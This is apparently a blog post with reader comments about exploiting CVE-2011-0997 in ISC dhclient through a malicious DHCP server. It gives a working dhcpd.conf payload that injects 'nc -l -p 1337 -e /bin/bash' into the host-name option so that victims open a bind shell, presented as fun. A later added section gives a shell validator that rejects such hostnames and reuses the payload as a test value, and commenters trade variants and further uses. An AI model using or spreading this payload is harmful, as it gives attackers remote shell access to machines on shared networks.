Saw a killer DHCP client bug come across the wire the other day and thought it would be fun to play around with. Here's some info on it:
dhclient in ISC DHCP 3.0.x through 4.2.x before 4.2.1-P1, 3.1-ESV before 3.1-ESV-R1, and 4.1-ESV before 4.1-ESV-R2 allows remote attackers to execute arbitrary commands via shell metacharacters in a hostname obtained from a DHCP message.
source: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0997
This is super easy to exploit: all you need to do is set up a DHCP server and set the client's hostname option to include our payload! Once you get DHCP up and running, edit your /etc/dhcp3/dhcpd.conf and locate the line that looks something like this:
subnet 10.10.5.0 netmask 255.255.255.0 {
Then right under it add something like this:
option host-name "test;nc -l -p 1337 -e /bin/bash";
Now, using the above payload, when someone requests an IP from you and it's accepted, a shell will open on port 1337 on their machine 😀
What happens is the victim's computer gets the hostname value from DHCP, then just runs it through the shell. Because we added the shell metacharacter ";", we are telling the shell that it has multiple commands to execute, which in the above case are the command that changes the hostname to test and "nc -l -p 1337 -e /bin/bash". Fun right? OK, that's it, peace.
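The root cause above is a value from the network reaching the shell unvalidated. As an added example (not code from the original post or from ISC DHCP), here is a small POSIX sh hook that a hardened client script could run on the DHCP-supplied host-name before anything touches it: the name must match the RFC 1123 hostname grammar (letters, digits and hyphens only), so every shell metacharacter, including the ";" used in the payload above, is rejected, and the accepted value is then passed to hostname(1) as a single quoted argument rather than interpolated into a command string. The function names `valid_hostname` and `set_hostname_safely` are mine, and the script assumes the caller hands it the option value (ISC's dhclient-script exposes it as `$new_host_name`); the sample inputs at the bottom are constructed.

```shell
#!/bin/sh
# Added example, not code from the original post or from ISC DHCP.
# Validates a DHCP-supplied host-name before it is handed to the shell
# or to hostname(1). The grammar is RFC 1123: labels of letters, digits
# and hyphens, 1-63 characters each, not beginning or ending with a
# hyphen, joined by dots, 253 characters in total at most. Shell
# metacharacters such as ';', '$', '`', '|', '&' and whitespace are
# outside that alphabet and therefore fail the check.

valid_hostname() {
    name=$1
    # Reject empty names and anything longer than the RFC 1123 limit.
    [ -n "$name" ] && [ "${#name}" -le 253 ] || return 1
    # Anchored whole-string match; printf keeps a leading '-' in the
    # value from being read as an option.
    printf '%s\n' "$name" | grep -Eq \
        '^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$'
}

# Hook a hardened client script could call with "$new_host_name"
# (hypothetical hook; the variable name is the one dhclient-script uses).
# The value is validated first and then passed as one quoted argument,
# never interpolated into a command string, so the shell never parses it.
# apply=1 really runs hostname(1); the default only reports the decision.
set_hostname_safely() {
    name=$1
    apply=${2:-0}
    if ! valid_hostname "$name"; then
        printf 'rejected DHCP host-name: %s\n' "$name" >&2
        return 1
    fi
    if [ "$apply" -eq 1 ]; then
        hostname "$name"
    else
        printf 'would set hostname to %s\n' "$name"
    fi
}

# Constructed sample values: a normal name, then the payload from the post.
set_hostname_safely "workstation07.example.net"
set_hostname_safely "test;nc -l -p 1337 -e /bin/bash" || true   # returns 1
```

Run with `sh` as a dry run; pass `1` as the second argument of `set_hostname_safely` only from a privileged hook that should really change the hostname. A validator like this is defence in depth: the vendor fix is to escape option values inside dhclient itself, but a client script that refuses anything outside the hostname grammar is cheap and catches the whole class of injected values, not just ";".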
This trick works only when a client does not have a hostname entry.
btw, what distro did you test on?
Oh crap, good catch on that. Thank you. Yes, the victim has to be set up to get its hostname from DHCP, and I tested it on Ubuntu.
In what version of Ubuntu did you try it?
I'm working on a 10.10 non-patched but the trick isn't working, can you give me more information?
Best regards,
inode
It's been a while, but I think I was using 10.04
how to set up dhclient to obtain the hostname from the DHCP server and set it as hostname?
add host-name to the list of requests in /etc/dhcp3/dhclient.conf
tnx 🙂 now it works and gets the host-name! but ';' won't escape, my hostname becomes something like this!
nima@clientname;nc -l -p 4444 -e /bin/bash$
again tnx for your attention
Bit late, I know, but would this trick be able to force open a port for SSH on the time capsule itself? That would be cool, if there was a way.
sure I don’t see why not.